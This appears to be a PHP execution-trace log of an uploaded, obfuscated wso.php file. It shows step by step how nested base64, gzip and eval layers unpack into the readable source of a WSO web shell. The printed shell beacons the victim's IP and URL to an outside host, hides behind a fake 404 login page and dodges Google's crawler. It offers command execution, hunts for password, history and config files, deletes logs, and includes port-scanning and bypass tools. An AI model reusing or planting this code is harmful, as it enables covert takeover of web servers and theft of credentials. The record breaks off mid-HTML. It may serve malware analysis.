1 A /var/www/html/uploads/wso.php 3 $stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2 4 0 0.000492 426920 base64_decode 0 /var/www/html/uploads/wso.php 4 1 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2 4 1 0.000513 427080
2 4 R 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 0 0.000535 427048 gzinflate 0 /var/www/html/uploads/wso.php 4 1 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 1 0.000559 427176
2 5 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 0 0.000576 427016 htmlspecialchars_decode 0 /var/www/html/uploads/wso.php 4 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 1 0.000593 427048
2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 7 0 0.000624 428576 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));' /var/www/html/uploads/wso.php 4 0
3 8 0 0.000639 428576 strrev 0 /var/www/html/uploads/wso.php(4) : eval()'d code 1 1 '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3 8 1 0.000692 461376
3 8 R 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3 9 0 0.000738 461344 base64_decode 0 /var/www/html/uploads/wso.php(4) : eval()'d code 1 1 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3 9 1 0.000854 494144
3 9 R '\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3 10 0 0.001301 461344 gzinflate 0 /var/www/html/uploads/wso.php(4) : eval()'d code 1 1 '\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3 10 1 0.001785 485952
3 10 R 'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3 11 0 0.002231 453152 gzuncompress 0 /var/www/html/uploads/wso.php(4) : eval()'d code 1 1 'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3 11 1 0.002938 539200
3 11 R '<?php\r\nfunction GetIP(){\r\n if(getenv("HTTP_CLIENT_IP")) {\r\n $ip = getenv("HTTP_CLIENT_IP");\r\n } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n if (strstr($ip, \',\')) {\r\n $tmp = explode (\',\', $ip);\r\n $ip = trim($tmp[0]);\r\n }\r\n } else {\r\n $ip = getenv("REMOTE_ADDR");\r\n }\r\n return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3 12 0 0.005696 1143752 eval 1 '?><?php\r\nfunction GetIP(){\r\n if(getenv("HTTP_CLIENT_IP")) {\r\n $ip = getenv("HTTP_CLIENT_IP");\r\n } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n if (strstr($ip, \',\')) {\r\n $tmp = explode (\',\', $ip);\r\n $ip = trim($tmp[0]);\r\n }\r\n } else {\r\n $ip = getenv("REMOTE_ADDR");\r\n }\r\n return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n if($gitt == false){\r\n @$gitt = file_get_contents($x);\r\n }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. \'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n 